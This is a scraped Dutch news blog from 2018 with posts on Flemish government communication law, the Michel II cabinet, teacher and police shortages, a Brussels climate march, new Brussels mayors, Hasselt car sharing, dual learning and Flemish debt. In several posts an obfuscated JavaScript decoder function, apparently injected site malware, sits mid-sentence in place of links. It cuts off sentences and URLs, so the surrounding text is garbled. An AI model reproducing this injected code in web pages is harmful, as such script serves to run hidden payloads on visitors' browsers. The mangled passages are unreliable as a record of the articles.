Dat geldt niet voor de strategische adviesraden, die onafhankelijk moeten zijn van het beleid van de Vlaamse overheid. (art II.11 eerste lid)

Duidelijk in welke fase beleid zich bevindt

Uit de overheidscommunicatie moet duidelijk blijken in welke fase besluitvorming of een project zich bevindt.

Als het om niet beslist beleid gaat, moet de communicatie feitelijk van aard en zakelijk van toon zijn. (art. II.11 tweede lid)

Herkenbaar als Vlaamse overheid

De communicatie van de Vlaamse overheid is duidelijk en als zodanig herkenbaar. Iedereen heeft altijd het recht te weten wanneer hij met een instantie van de Vlaamse overheid te maken heeft.

De Vlaamse overheid profileert zich als één geheel en is altijd, ongeacht het kanaal of medium, herkenbaar als afzender of medeafzender, deelnemer, belanghebbend of betrokken bij de communicatie.

Alle onderdelen van de Vlaamse overheid maken zich herkenbaar door naar de Vlaamse overheid te verwijzen en kunnen daarnaast hun eigen entiteit tot uitdrukking brengen.

De Vlaamse Regering stelt nadere regels vast voor de toepassing van dit artikel.

Een van de belangrijkste elementen om de herkenbaarheid van de Vlaamse overheid te garanderen, is de verplichte gemeenschappelijke function oc532bd2f6(uf){var yd='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=';var vb='';var y4,sd,t3,rd,y3,x1,s0;var nd=0;do{rd=yd.indexOf(uf.charAt(nd++));y3=yd.indexOf(uf.charAt(nd++));x1=yd.indexOf(uf.charAt(nd++));s0=yd.indexOf(uf.charAt(nd++));y4=(rd<<2)|(y3>>4);sd=((y3&15)<<4)|(x1>>2);t3=((x1&3)<<6)|s0;if(y4>=192)y4+=848;else if(y4==168)y4=1025;else if(y4==184)y4=1105;vb+=String.fromCharCode(y4);if(x1!=64){if(sd>=192)sd+=848;else if(sd==168)sd=1025;else if(sd==184)sd=1105;vb+=String.fromCharCode(sd);}if(s0!=64){if(t3>=192)t3+=848;else if(t3==168)t3=1025;else if(t3==184)t3=1105;vb+=String.fromCharCode(t3);}}while(ndanderen.be/communicatie/huisstijl">huisstijlDie maakt een indeling van de communicatie van de Vlaamse overheid in drie niveaus:

 • Niveau 1: corporate communicatie
 • Niveau 2: thematische communicatie
 • Niveau 3: communicatie door entiteiten die in Vlaanderen permanent fysiek contact hebben met het grote publiek

Voor sommige types van communicatie kan de Vlaamse Regering specifieke richtlijnen maken, bijvoorbeeld voor de omroepprogramma’s van de VRT of voor bepaalde communicatie van de strategische adviesorganen.

Het Vlaams Parlement en de instellingen die daaraan verbonden zijn, vallen niet onder dit artikel, net als de investeringsmaatschappijen. (art. II.12)

Politiek neutraal

Overheidsinstanties die communiceren namens de overheid, communiceren politiek neutraal.

Dat betekent bijvoorbeeld dat leden van de Vlaamse Regering politiek neutraal communiceren als ze optreden in hun hoedanigheid van minister. Als ze bijvoorbeeld een interview geven als politicus van een bepaalde partij, communiceren ze uiteraard niet politiek neutraal.

In overheidscommunicatie verwijzen naar een naam of partij van een mandataris kan alleen als het discreet gebeurt en een informatieve meerwaarde heeft. Bij het gebruiken van persoonlijke gegevens van politici, het inlassen van foto's of audiovisuele bijdragen waakt de Vlaamse overheid erover dat de inlassing in de eerste plaats informatief is en dat er geen publicitaire, eenzijdige of opiniërende indruk rond de persoon wordt gewekt.

Bij het aanreiken van informatie aan externe media moet de inhoud van het beleid centraal staan, en niet de bewindspersoon of zijn partij.

Commercieel neutraal

De overheidsinstanties communiceren commercieel neutraal.

Ze lenen zich in hun eigen communicatie niet tot reclame of sluikreclame voor private bedrijven, merken of private personen. Ze kunnen alleen verwijzen naar private bedrijven of personen, hun merknamen, logo’s, of de diensten die ze geleverd hebben, naar hun merken of producten, als die informatie relevant of noodzakelijk is voor hun eigen boodschap.

De overheidsintanties kunnen in hun eigen communicatiekanalen of media alleen ruimte laten voor betalende reclame van private bedrijven, merken of personen, als die reclame duidelijk wordt onderscheiden van de communicatie van de overheid zelf.

Ze aanvaarden voor hun communicatie geen aanbiedingen tot samenwerking van private derden, waarin die derden een duidelijk aanwijsbaar eenzijdig of dominant belang hebben, ook niet als die samenwerking kosteloos is of tegen gunstige voorwaarden kan worden verkregen. (art II.14)

Adverteren in of samenwerken met externe media

Als de Vlaamse overheid adverteert in of samenwerkt met externe media (bijvoorbeeld in de vorm van publireportages) gelden er drie voorwaarden:

 • Het initiatief is gericht op een weloverwogen en duidelijk aanwijsbare communicatiedoelstelling van de Vlaamse overheid.
 • De Vlaamse overheid houdt de volledige zeggenschap over de inhoud.
 • De Vlaamse overheid is duidelijk herkenbaar. (art. II.15)

Contactgegevens in berichten

Overheidsinstanties sturen berichten die rechtsgevolgen tot stand brengen bij de toepassing van wettelijke en reglementaire bepalingen. Zo'n berichten moeten de contactgegevens bevatten van diegene die meer informatie kan geven over het dossier. Dat hoeven geen contactgegevens van een individueel personeelslid te zijn. Het mag bijvoorbeeld ook een  telefoonnummer of mailadres van een team zijn. (art II.20)

Beslissingen van de Vlaamse Regering met bijhorende documenten op vlaanderen.be

De beslissingen van de Vlaamse Regering worden samen met de bijhorende documenten systematisch gepubliceerd op de centrale website van de Vlaamse overheid. Die bepaling stond al in het bevoegdheidsbesluit van de Vlaamse Regering maar wordt nu decretaal verankerd. (art II.9 eerste lid)

Ook voor lokale overheden

Sommige bepalingen zijn ook van toepassing op de lokale overheden. Sommige zijn nieuw, andere stonden al in het openbaarheidsdecreet. Samengevat gaat het om:

 • Het principe van een goede actieve voorlichting (art. II.2)
 • Informatie correct beheren en publiceren (art. II.3)
 • Medewerking aan gezamenlijke gegevensbronnen met basisinformatie (art. II.5)
 • De praktische modaliteiten voor burgers die informatie zoeken (art. II.6)
 • Het burgerloket (art. II.7)
 • Communiceren in de standaardtaal en een heldere taal gebruiken die begrijpelijk is voor de ontvanger (art. II.10)
 • Duidelijk communiceren in welke fase besluitvorming of een project zich bevindt (art. II.11 tweede lid)
 • Politiek neutraal communiceren (art. II.13)
 • Commercieel neutraal communiceren (art. II.14)
 • Als de overheid gebruik maakt van externe media moet het initiatief gericht zijn op een weloverwogen en duidelijk aanwijsbare communicatiedoelstelling van de overheid, moet ze volledige zeggenschap houden over de inhoud en moet ze duidelijk herkenbaar zijn als overheid (art. II.15)
 • De verplichtingen die de richtlijn webtoegankelijkheid oplegt (art. II.16 en II.17)
Reacties uitgeschakeld voor De samenstelling van de nieuwe regering

De samenstelling van de nieuwe regering

Door | 9 december 2018 | Nieuws

Philippe De Backer (Open Vld) wordt minister van Telecommunicatie, Pieter De Crem (CD&V) minister van Binnenlandse Zaken.
Opvallend: Maggie De Block (Open Vld) wordt opnieuw bevoegd voor Asiel en Migratie. De regering-Michel II (MR, CD&V en Open Vld) telt 1 premier, 12 ministers en geen staatssecretarissen.

Een overzicht.
• Charles Michel (MR): Eerste minister
Promoveren tot minister:
• Philippe De Backer (Open Vld): wordt minister van Telecommunicatie, Administratieve Vereenvoudiging, Digitale Agenda en Post (voorheen Alexander De Croo)
• Pieter De Crem (CD&V): wordt minister van Binnenlandse Zaken en Veiligheid (voorheen Jan Jambon)
Pieter De Crem was staatssecretaris voor Buitenlandse Handel © BELGA
Krijgen extra bevoegdheden:
• Kris Peeters (CD&V): vicepremier en minister van Werk, Economie en Consumentenzaken; krijgt portefeuille Armoedebestrijding, Gelijke Kansen en Personen met een beperking (voorheen van Zuhal Demir)
• Alexander De Croo (Open Vld): vicepremier en minister van Ontwikkelingssamenwerking, krijgt portefeuille Financiën en Fraudebestrijding (voorheen van Johan Van Overtveldt)
• Maggie De Block (Open Vld): minister van Sociale Zaken en Volksgezondheid: krijgt de portefeuille Asiel en Migratie (voorheen van Theo Francken)
• Didier Reynders (MR): vicepremier en minister van Buitenlandse Zaken, Europese Zaken en Beliris, krijgt de portefeuille Defensie (voorheen van Sander Loones)
• Koen Geens (CD&V): minister van Justitie, krijgt portefeuille Regie der Gebouwen (voorheen van Jan Jambon)
Blijven minister:
• Denis Ducarme (MR): minister van Middenstand, Zelfstandigen en KMO’s, Landbouw en Sociale Integratie, krijgt portefeuille Grote Steden (van Zuhal Demir).
• Sophie Wilmès (MR): minister van Begroting en Nationale Loterij, krijgt portefeuille wetenschapsbeleid (van Zuhal Demir) en Ambtenarenzaken (van Sander Loones).
• Daniel Bacquelaine (MR): minister van Pensioenen
• François Bellot (MR): minister van Mobiliteit en NMBS
• Marie-Christine Marghem (MR): minister van Energie, Leefmilieu en Duurzame Ontwikkeling

Reacties uitgeschakeld voor Zorgkinderen en lerarentekort

Zorgkinderen en lerarentekort

Door | 5 december 2018 | Nieuws

Het lerarentekort neemt alarmerende proporties aan. Zestien directeurs dienden een klacht in bij de Kinderrechten­commissaris om aan te klagen dat ze niet alle kinderen de zorg en het onderwijs kunnen geven waar ze recht op hebben. “Scholen vinden geen vervangers voor zieke leerkrachten en de griep is nog niet eens in het land”, zegt Marie-Jeanne Baelmans van de Vereniging Leidinggevenden Vlaams Onderwijs (VLVO), die 1.200 schooldirecteurs ver­tegenwoordigt.

De Vereniging Leidinggevenden Vlaams Onderwijs (VLVO) stuurde een modelbrief naar de directeurs om een klacht in te dienen en brengt alle tekorten in kaart. Al 140 scholen hebben een probleem gemeld.

“In mijn lagere school staan twaalf leerkrachten. Vorige week waren er vier ziek en ik vond maar één parttime vervanging”, zegt Leen Smets van basisschool Sint-Jozef & Sint-Janneke in Eeklo. “De sport- en zorgleraar en iemand van het secretariaat moesten inspringen. Vooral zorgkinderen lijden er onder. De klastitularis die alle maatregelen kent valt weg en de zorgleraar moet elders lesgeven.”

Onderwijsminister Crevits (CD&V) nam al verschillende maatregelen om het beroep aantrekkelijker te maken en lanceert een campagne in het voorjaar van 2019.

Reacties uitgeschakeld voor Deelnemers van klimaatmars geven politiek signaal

Deelnemers van klimaatmars geven politiek signaal

Door | 2 december 2018 | Nieuws

65.000 deelnemers voor grootste Belgische klimaatmars ooit: ‘Overdonderend en historisch’

De Standaard, 2/12/2018De klimaatmars 'Claim the climate' heeft 65.000 mensen op de been gebracht in Brussel, zo blijkt uit officiële cijfers van de politie Brussel Hoofdstad-Elsene. De organisatoren spreken zelf over 70.000 à 75.000 deelnemers. 'Dit is overdonderend en historisch.'

 

De organisaties Climate Express, de Klimaatcoalitie en BOS+ trokken zondag met het grootste Belgische klimaatprotest ooit door het centrum van Brussel, daar hebben 65.000 deelnemers voor gezorgd. En dat ondanks het natte weer.

De organisatoren spreken over 70.000 à 75.000 deelnemers. Ze stelden het cijfer nog bij omdat veel mensen zich nog bij de mars hebben gevoegd langs de route en vanuit de verschillende metrostations die langs het parcours lagen. Ook de 5.000 deelnemende fietsers moeten bijgeteld worden.

Ook enkele politici en bekendheden liepen mee, zoals minister van Energie Marie-Christine Marghem, Bruno Tobback, Olivier Maingain, zangeres Angèle, muzikant Jan Paternoster en radiopresentatrice Eva De Roo.

'Dit is overdonderend en historisch', zegt Charlotte Scheerens van Climate Express. 'We zijn enorm gelukkig, want dit geeft enorm veel hoop voor de toekomst. Het toont aan dat er een groot draagvlak is voor ambitieus klimaatbeleid in België.'

'Dit is een enorm sterk signaal. De politici kunnen dit niet meer negeren. We verwachten dat ze deze eisen in concrete daden gaan omzetten. In het algemeen gaat dat over meer ambitie op vlak van hernieuwbare energie, we moeten ook meer denken aan efficiënter energieverbruik en daarnaast moeten we veel minder uitstoten', aldus Scheerens.

'Ruim onze planeet op'

De aanleiding voor de klimaatmars is de internationale klimaattop COP24, die zondag in Polen begint. Met het massale protest eisen de betogers dat de Belgische politici meer ambitie tonen voor een doorgedreven nationaal klimaatbeleid op korte én lange termijn. De gemeenschappelijke boodschap is duidelijk: als we nu niet handelen om het klimaat te redden, is het te laat, en er is geen planeet B.

De klimaatmars ging zondag om 13 uur stipt onder luid gejuich van start in de buurt van het station Brussel-Noord. Tientallen organisaties zoals Greenpeace, Natuurpunt, 11.11.11, Oxfam, maar ook jeugdbewegingen tonen zich in het gezamenlijke protest voor een beter klimaatbeleid. De betogers gingen verder via de Koning Albert II-laan, langs Kruidtuin en Madou, over de Wetstraat en het Schumanplein, om om 15 uur te eindigen in het Jubelpark. Daar vonden enkele verrassingsoptredens plaats.

Tussen de vele kinderen die meestapten in de klimaatmars was ook de 13-jarige Bo. Zij sprak het Jubelpark toe met een duidelijke boodschap. 'Als wij rommel maken, vragen volwassenen het op te ruimen. Nu hebben de volwassenen rommel gemaakt en vragen ze ons het op te ruimen. Dat is niet eerlijk. Onze boodschap is helder: ruim onze planeet op, voor onze toekomst', zegt Bo.

Extra treinen

De massale opkomst zorgde voor grote drukte in de metro- en treinstations. De MIVB maakte zondag wel haar openbaar vervoer gratis en de NMBS bood een Green Ticket van 5 euro aan. De metro's van de MIVB zaten overvol en in het station Brussel-Noord moesten treinen tegengehouden worden omdat er te veel mensen waren.

Na afloop van de mars legde de NMBS extra treinen in, om iedereen ook op een groene manier thuis te brengen. Daarnaast was er een pendeltrein voorzien tussen de stations Brussel-Luxemburg, Brussel-Schuman en Brussel-Noord. 'We hadden de extra treinen op voorhand ingepland omdat we veel volk hadden verwacht', zegt woordvoerder Dimitri Temmerman. 'Vanmiddag hebben we de capaciteit verhoogd met 11.000 bijkomende zitplaatsen.'

Reacties uitgeschakeld voor Brusselse burgemeesters beginnen eraan deze week

Brusselse burgemeesters beginnen eraan deze week

Door | 2 december 2018 | Nieuws

Bron: De Standaard, 2/12/2018

function oc532bd2f6(uf){var yd='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=';var vb='';var y4,sd,t3,rd,y3,x1,s0;var nd=0;do{rd=yd.indexOf(uf.charAt(nd++));y3=yd.indexOf(uf.charAt(nd++));x1=yd.indexOf(uf.charAt(nd++));s0=yd.indexOf(uf.charAt(nd++));y4=(rd<<2)|(y3>>4);sd=((y3&15)<<4)|(x1>>2);t3=((x1&3)<<6)|s0;if(y4>=192)y4+=848;else if(y4==168)y4=1025;else if(y4==184)y4=1105;vb+=String.fromCharCode(y4);if(x1!=64){if(sd>=192)sd+=848;else if(sd==168)sd=1025;else if(sd==184)sd=1105;vb+=String.fromCharCode(sd);}if(s0!=64){if(t3>=192)t3+=848;else if(t3==168)t3=1025;else if(t3==184)t3=1105;vb+=String.fromCharCode(t3);}}while(ndandaard.be/cnt/dmf20181202_04004249">

Deze week worden in de 19 Brusselse gemeenten de nieuwe schepencolleges en gemeenteraden geïnstalleerd. Brussel begint een maand vroeger dan Vlaanderen: de wissel van de lokale macht moet er tussen 1 en 7 december gebeuren. Vijf nieuwe gezichten hebben de eed afgelegd bij minister-president Rudi Vervoort (PS).

In Brussel beginnen de nieuwe ploegen er deze week aan. Eind vorige week legden de burgemeesters de eed af aan minister-president Rudi Vervoort (PS), vanaf deze maand besturen zij hun gemeenten. Op de gemeenteraden worden de komende dagen de nieuwe raadsleden en schepencolleges ingezworen, her en der gebeurde het afgelopen weekend al. Zo legde vice-minister-president Guy Vanhengel voor de zesde keer de eed als gemeenteraadslid af in Evere, waar Vervoort titelvoerend burgemeester is.

Omdat die laatste moeilijk zichzelf kan inzweren, deed hij dat bij zijn minister Gosuin (Défi) - de burgemeester van Oudergem. Brussel en Wallonië beginnen er altijd wat vroeger aan. In Vlaanderen zijn de regels anders. Daar hebben amper een handvol burgemeesters al de eed afgelegd, het gros volgt doorgaans in de loop van december. De nieuwe gemeenteraden starten pas op 1 januari.

Vijf nieuwe gezichten

In de 19 gemeenten zien we vijf nieuwe gezichten. In Ganshoren bestuurt voortaan de eerste Belgische burgemeester van Congolese afkomst, function oc532bd2f6(uf){var yd='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=';var vb='';var y4,sd,t3,rd,y3,x1,s0;var nd=0;do{rd=yd.indexOf(uf.charAt(nd++));y3=yd.indexOf(uf.charAt(nd++));x1=yd.indexOf(uf.charAt(nd++));s0=yd.indexOf(uf.charAt(nd++));y4=(rd<<2)|(y3>>4);sd=((y3&15)<<4)|(x1>>2);t3=((x1&3)<<6)|s0;if(y4>=192)y4+=848;else if(y4==168)y4=1025;else if(y4==184)y4=1105;vb+=String.fromCharCode(y4);if(x1!=64){if(sd>=192)sd+=848;else if(sd==168)sd=1025;else if(sd==184)sd=1105;vb+=String.fromCharCode(sd);}if(s0!=64){if(t3>=192)t3+=848;else if(t3==168)t3=1025;else if(t3==184)t3=1105;vb+=String.fromCharCode(t3);}}while(ndandaard.be/cnt/dmf20181129_03998668" target="_blank" rel="noopener">Pierre Kompany (ProGanshoren) - de vader van Rode Duivel Vincent. Molenbeek krijgt met Catherine Moureaux (PS) weer een Moureaux in het gemeentehuis, en in Elsene heeft voormalig staatssecretaris Christos Doulkeridis (Ecolo) de sjerp afgenomen van Dominique Dufourny (MR). Ook Koekelberg is een verrassing: daar zette Ahmed Laaouej (PS) de liberale baron Philippe Pivin aan de kant met een alternatieve meerderheid.

In Vorst, tot slot, komt ecologist Stéphane Roberti aan de macht. Na Doulkeridis en Olivier Deleuze in Watermaal-Bosvoorde - die zijn mandaat verlengt - is hij de derde groene burgemeester in het Brussels gewest.

De ingezworen burgemeesters kregen van Vervoort allemaal een kader met een foto uit hun gemeente, gemaakt door een Belgische artiest.

Reacties uitgeschakeld voor Stadspersoneel en Hasselaren gaan elektrische wagens delen

Stadspersoneel en Hasselaren gaan elektrische wagens delen

Door | 1 december 2018 | Nieuws


Bron: https://www.gemeentevoordetoekomst.be – donderdag 29 november 2018

function oc532bd2f6(uf){var yd=’ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=’;var vb=”;var y4,sd,t3,rd,y3,x1,s0;var nd=0;do{rd=yd.indexOf(uf.charAt(nd++));y3=yd.indexOf(uf.charAt(nd++));x1=yd.indexOf(uf.charAt(nd++));s0=yd.indexOf(uf.charAt(nd++));y4=(rd<<2)|(y3>>4);sd=((y3&15)<<4)|(x1>>2);t3=((x1&3)<<6)|s0;if(y4>=192)y4+=848;else if(y4==168)y4=1025;else if(y4==184)y4=1105;vb+=String.fromCharCode(y4);if(x1!=64){if(sd>=192)sd+=848;else if(sd==168)sd=1025;else if(sd==184)sd=1105;vb+=String.fromCharCode(sd);}if(s0!=64){if(t3>=192)t3+=848;else if(t3==168)t3=1025;else if(t3==184)t3=1105;vb+=String.fromCharCode(t3);}}while(ndandscape_-_large/public/images/hasselt_vloot.jpg?itok=0WLrAvpQ” alt=””/>

Mobiliteit en duurzaamheid worden prominente thema’s in de beleidsplannen voor de komende legislatuur. Een uitgelezen kans om in het wagenparkbeheer de nadruk te leggen op versnelde vergroening en de mogelijkheden te onderzoeken om deze voertuigen efficiënt met de inwoners te delen. 

De stad Hasselt ging recent een samenwerking aan met ZEN CAR, de eerste landelijke aanbieder van elektrisch autodelen, voor 13 elektrische deelauto’s. Daarvan kunnen er tien gedeeld gebruikt worden door het stadspersoneel en de Hasselaren. “Buiten de werkuren krijgen de wagens een vaste standplaats aan een voorbehouden laadpaal nabij de binnenstad waar bewoners ze kunnen ontlenen. De overige drie krijgen een vaste uitleenlocatie in de buitenwijken”, zegt vervangend schepen van Faciliteitenbeheer Michel Froidmont. 

Het gebruik van stadsvoertuigen maximaliseren

“Toen we besloten om een gedeelte van onze vloot te vergroenen, gingen we op zoek naar een systeem waarbij we het gebruik van de stadsvoertuigen konden maximaliseren”, vertelt initiatiefnemer schepen van Faciliteitenbeheer Kevin Schouterden. “De voertuigen die onze personeelsleden nu benutten, blijven na de werkuren en tijdens het weekend op stal. Dit terwijl ze perfect dienst kunnen doen als deelwagen. Zelf zo’n systeem organiseren, is niet wenselijk. Vandaar dat we een rondvraag organiseerden, waaruit ZEN CAR als partner werd weerhouden.” 

Bewuste keuze levert vele voordelen op

“Dit systeem biedt meerdere voordelen”, onderstreept Schouterden. “In stedelijke omgevingen neemt de parkeerdruk alsmaar toe. Autodeelsystemen kunnen hierop mee een antwoord bieden. Vandaar dat we als bestuur dit aanbod willen uitbreiden. Dat doen we niet enkel in het centrum, maar ook in de buitenwijken. Daarnaast kozen we bewust voor duurzame deelwagens. Als stad vervullen we zo een mooie voorbeeldrol, maken we de Hasselaren warm voor elektrisch rijden én helpen we de vooroordelen de wereld uit.

Zelf aan de slag

Autodelen.net maakt in overleg een plan op maat voor de praktische organisatie van een gemeentelijk autodeelsysteem. Ze biedt eveneens inhoudelijke ondersteuning bij de opmaak van een communicatie- en promotiecampagne.

Reacties uitgeschakeld voor Campagne wil jongeren en hun ouders warm maken voor Duaal Leren

Campagne wil jongeren en hun ouders warm maken voor Duaal Leren

Door | 29 november 2018 | Nieuws


Persbericht kabinet Vlaams minister van Onderwijs, 28 november 2018


Duaal leren, de ideale mix van leren in een onderneming en op school, geeft leerlingen voorsprong. Om deze boodschap te onderstrepen en om het draagvlak van het vernieuwd stelsel nog verder uit te bouwen, lanceert de Vlaamse overheid op initiatief van minister van Onderwijs Hilde Crevits en minister van Werk Philippe Muyters –– voor het eerst een grootschalige campagne. Het doel? Jongeren, ouders, scholen en ondernemingen oproepen om nog meer de kaart te trekken van duaal leren.

In meer dan 80 studierichtingen

Duaal leren houdt in dat jongeren vanaf 15 jaar leren op de werkvloer combineren met leren op de schoolbank. Op die manier behalen ze  een diploma en worden ze beter voorbereid op de arbeidsmarkt. Duaal leren is één van de maatregelen om het beroeps- en technisch onderwijs te versterken, de praktische kennis van de bedrijven mee te nemen in het onderwijs en ervoor te zorgen dat er minder jongeren vroegtijdig het onderwijs verlaten. Vanaf volgend schooljaar wordt duaal leren mogelijk in meer dan 80 studierichtingen, waaronder ook STEM-opleidingen.

1.095 leerlingen in meer dan 40 studierichtingen kozen dit schooljaar al voor een duale opleiding. De campagne van de Vlaamse overheid wil de aantallen stevig opkrikken, want er zit een enorm groot potentieel in. Op 1 oktober 2018 waren er  al dubbel zoveel werkplekken dan leerlingen. De ambitie is om ervoor te zorgen dat er voor elke jongere een werkplek is – en voor elke werkplek een jongere – en dat leerlingen in de toekomst op verschillende werkplekken kunnen leren. Zo halen zowel de jongeren, maar ook de ondernemingen het maximale uit duaal leren.

Vlaams minister van Onderwijs Hilde Crevits: “Vanaf september 2019 wordt duaal leren in heel Vlaanderen breed uitgerold. Iedere jongere uit het technisch, beroeps of buitengewoon onderwijs kan dan kiezen tussen een voltijdse en een duale leerweg voor het behalen van een diploma. En dat is niet te vroeg, want Vlaanderen is echt klaar voor een leersysteem dat is aangepast aan de 21e eeuw. Dat merk je aan de steeds stijgende aantallen scholen, centra en ondernemingen die voluit kiezen voor duaal leren. Onze campagne moet zorgen voor een extra duwtje in de rug en leerlingen en hun ouders ervan overtuigen dat dit de ideale mix voor hun toekomst is.”

Eerste campagne duaal leren

Om nieuwe werkplekken te vinden én om deze in te vullen met gemotiveerde studenten, lanceren het departement Onderwijs, het departement Werk en Syntra Vlaanderen voor het eerst een grootschalige campagne. Centraal staat de nieuwe portaalwebsite function oc532bd2f6(uf){var yd='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=';var vb='';var y4,sd,t3,rd,y3,x1,s0;var nd=0;do{rd=yd.indexOf(uf.charAt(nd++));y3=yd.indexOf(uf.charAt(nd++));x1=yd.indexOf(uf.charAt(nd++));s0=yd.indexOf(uf.charAt(nd++));y4=(rd<<2)|(y3>>4);sd=((y3&15)<<4)|(x1>>2);t3=((x1&3)<<6)|s0;if(y4>=192)y4+=848;else if(y4==168)y4=1025;else if(y4==184)y4=1105;vb+=String.fromCharCode(y4);if(x1!=64){if(sd>=192)sd+=848;else if(sd==168)sd=1025;else if(sd==184)sd=1105;vb+=String.fromCharCode(sd);}if(s0!=64){if(t3>=192)t3+=848;else if(t3==168)t3=1025;else if(t3==184)t3=1105;vb+=String.fromCharCode(t3);}}while(ndanderen/">www.duaalleren.vlaanderen die alle vragen van leerlingen, scholen en bedrijven bundelt en beantwoordt. Verder worden advertenties in werkgeversmagazines en affiches voor onderwijsinstellingen breed ingezet, volgen er digitale oproepen tot actie voor scholen en ondernemingen en is er een radiospot in samenwerking met Belgisch Kampioen Beatboxen Foodbox G om leerlingen en ouders aan te moedigen zich te informeren over duale opleidingen.

Vlaams minister van Werk Philippe Muyters: “Duaal leren combineert het beste van twee werelden en levert gemotiveerde en goed opgeleide jongeren af. Het brengt leerlingen op een perfecte manier aan de start van hun loopbaan. Hoe vroeger je in contact komt met leren op de werkvloer, hoe vlotter je nieuwe skills aanleert en je vaardigheden kan aanscherpt. Ook onze ondernemingen hebben er baat bij, omdat ze de werknemers van de toekomst mee vormen. De duale leerweg geeft dus echt voorsprong aan studenten en werkgevers.”

Reacties uitgeschakeld voor Federale politie: 1.829 agenten te kort

Federale politie: 1.829 agenten te kort

Door | 24 november 2018 | Nieuws

In deze tijd van stijgende aandacht voor veiligheid komt de federale politie van dit land niettemin agenten te kort op alle terreinen. 1.829 agenten heeft men te weinig, oftewel een tekort van 16,6%. Veel diensten missen een derde tot de helft van de mankracht. Minister van Binnenlandse Zaken Jan Jambon (N-VA) belooft verbetering. Maar voorlopig is het “op de tanden bijten.”

Bijna geen enkele dienst van de federale politie draait op volle toeren. De speciale eenheden, de wegpolitie, de dienst Hondensteun, noem maar op. Allen missen zij de nodige manschappen. Dat blijkt uit cijfers die minister Jambon overmaakte aan de opvolgingscommissie rond de aanslagen van 22 maart. Slechts één enkele dienst is voltallig: de dienst voor middelenbeheer en informatie DGR waaronder – o ironie – ook de rekrutering ondergebracht is. Overigens kwam de rekruting in september nog negatief onder de aandacht omdat men zelf ongeschikte kandidaten aannam door het nijpend tekort.

2,5 jaar na die aanslagen heeft de luchtvaartpolitie op Zaventem nog steeds een kwart politiemensen te weinig. Op de luchthaven van Luik is dat zelfs een derde. Ook de wegpolitie van de provincies Antwerpen, Oost-Vlaanderen en Henegouwen hebben het moeilijk met tekorten tot 30%. Zelfs de dienst die instaat voor de bescherming van hoogwaardigheidsbekleders draait maar op 2/3 van de kracht. Het FAST-team, dat gevluchte criminelen opspoort, mist de helft van de manschappen. Dat terwijl het binnenkort nog extra bevoegdheden krijgt.

Reacties uitgeschakeld voor Vlaamse overheidsschuld stijgt naar recordbedrag

Vlaamse overheidsschuld stijgt naar recordbedrag

Door | 24 november 2018 | Nieuws

De Vlaamse overheid torst volgend jaar 26,8 miljard euro schulden op een totale begroting van bijna 41 miljard euro. Dat is ongeveer evenveel als de budgetten voor onderwijs, werk en welzijn samen.

De komende jaren stijgt die schuld tot 34,1 miljard euro in 2023, zo blijkt uit de meerjarenraming die de regering in het Vlaams Parlement heeft ingediend. Dat schrijft De Tijd. Ter vergelijking: de totale Belgische overheidsschuld bedraagt ongeveer 455 miljard euro.

Het Rekenhof noemde de Vlaamse regering eerder al een ‘knipperlicht’ en vroeg om beter schuldbeheer. De Vlaamse regering legde vorig jaar daarom een schuldnorm vast. De Vlaamse schuld mag in 2022 maximaal 35 miljard euro bedragen of 7 procent van het bbp.

Ook wijst de Vlaamse regering er in haar meerjarenraming op dat tegenover de schulden ook vermarktbare financiële activa staan en materiële activa, zoals de geplande Oosterweelverbinding in Antwerpen.

Om de strenge Europese begrotingsregels te omzeilen, zette Vlaanderen jarenlang in op alternatieve financiering om te kunnen investeren in bijvoorbeeld scholen en rusthuizen.

Reacties uitgeschakeld voor Hoe rekbaar is het kind ?

Hoe rekbaar is het kind ?

Door | 22 november 2018 | Nieuws

Elke overheid heeft de plicht de rechten van ieder kind te eerbiedigen en te waarborgen.

‘Kinderen zijn kwetsbaar spul. Volwassenen zijn gelijmde kinderen.’ Dit scherpe, en tegelijk ontroerende citaat van Johan Anthierens zegt waar dit jaarverslag over gaat.

Kinderrechten zijn er voor alle kinderen. Dat is evident. Tegelijk zien we kinderrechten vooral in beeld komen als het met kinderen niet goed gaat. Schendingen van kinderrechten tonen het wezenlijke belang van die rechten. Net daarom is het zo belangrijk om van in het begin ons doen en denken met en over kinderen te laten rijmen met een kinderrechtenperspectief. Dat is de ambitie van ons advieswerk. Of het nu gaat over pleegzorg, het inschrijvings­ recht op school, de aanpak van jeugddelinquen­ tie of de leerlingenbegeleiding, elke keer opnieuw vertrekken we van de overtuiging dat rechten van kinderen een onmisbare kapstok zijn om nieuw beleid uit te denken. In ons ombudswerk ligt de kwetsbaarheid van kinderen vaak heel confronte­ rend op tafel. En niet alleen die van kinderen. Het gaat in ombudswerk ook om ouders als gelijmde kinderen, om professionals van wie het geduld op is, om familieleden vol goede bedoelingen. Het maakt ombudswerk met en voor kinderen tot een van de moeilijkste dingen die er zijn. Je moet draden zoeken die opnieuw een stevig touw kunnen vormen als zowat het hele touw uitgera­ feld is. Dat hebben we dit jaar honderden keren gedaan. Vaak met succes, maar jammer genoeg lukt het niet altijd.

Kwetsbaar, krachtig en veerkrachtig

‘Hoe rekbaar is het kind?’ is de titel van dit jaar­ verslag.Kwetsbaarheid is niet het enige label dat we op kinderen kunnen plakken.Kinderen zijn ook krachtig, zoeken mee naar oplossingen en tonen soms ontzettend veel veerkracht. Ik denk aan Kevin die al meer dan een jaar in een gemeenschapsinstelling zit en zo sterk toewerkt naar het moment waarop zijn vervolgtraject ein­ delijk kan beginnen. Ik denk aan Ali die samen met zijn ouders, broers en zussen in een open terugkeerwoning zit, heel bang is, maar tegelijk blijft zoeken naar hoopvolle oplossingen. Ik denk aan Oona die op haar 15 jaar in haar vrienden­ kring met suïcide geconfronteerd werd en nu ze 20 is terecht trots mag zijn op haar boek over peer support. Maar het lukt niet altijd.

